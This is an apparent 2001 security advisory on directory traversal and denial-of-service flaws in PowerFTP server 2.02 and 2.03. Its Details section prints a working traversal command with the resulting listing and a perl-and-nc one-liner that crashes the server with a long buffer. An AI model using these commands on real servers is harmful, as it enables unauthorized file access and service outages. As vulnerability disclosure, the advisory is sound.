|
Title
|
PowerFTP Directory Traversal and DoS Vulnerabilities
|
|
ID
|
SYBSEC-ADV13
|
|
Severity
|
HIGH - Remote DoS / Traversal
|
|
History
|
30.NOV.2001 Vulnerability discovered
30.NOV.2001 Vendor contacted
|
|
Scope
|
Application Denial of Service and Directory Traversal
|
|
Platforms
|
Any win33 platforms
|
|
Author
|
|
|
URL
|
http://www.sybsecurity.com/advisors/SYBSEC-ADV13-PowerFTP_Directory_Traversal_and_DoS_Vulnerabilities
|
|
Release
|
Public
|
|
Overview
|
PowerFTP is a powerful FTP client/server software
|
|
Affected versions
|
The vulnerability has been reported in versions FTP Server
PowerFTP version 2.03
PowerFTP version 2.02
|
|
Description
|
Three security vulnerabilities have been found in the product
- one allows access to files that reside outside the chained FTP root directory, another to
cause the product to crash by sending it a long buffer, and the last one to utilize all
available CPU by accessing the floppy drive.
|
|
Workaround
|
|
|
Acknowledgments
|
|
|
References
|
|
|
Details
|
Traversal exploit 1:
Directory Traversal:
Example:
ftp> ls ../../../../../../../
200 Port command successful.
150 Opening data connection for directory list.
SUHDLOG.DAT
COMMAND.COM
BOOTLOG.PRV
FRUNLOG.TXT
DOS
AUTOEXEC.DOS
CONFIG.DOS
VIDEOROM.BIN
CONFIG.SYS
DBLSPACE.BIN
MSDOS.SYS
MSDOS.---
SETUPLOG.TXT
WINDOWS
test.txt.txt
Denial of Service:
Example:
# perl -e ' for ($i=1;$i<2049;$i++) { print "A";} ' | nc 10.0.0.1 21
220 Personal FTP Server ready
The server will then crash causing a denial of service attack.
|
|
Exploit tool
|
|
|
Exploit tool
|
|
|
Exploit tool
|
|
Buscar
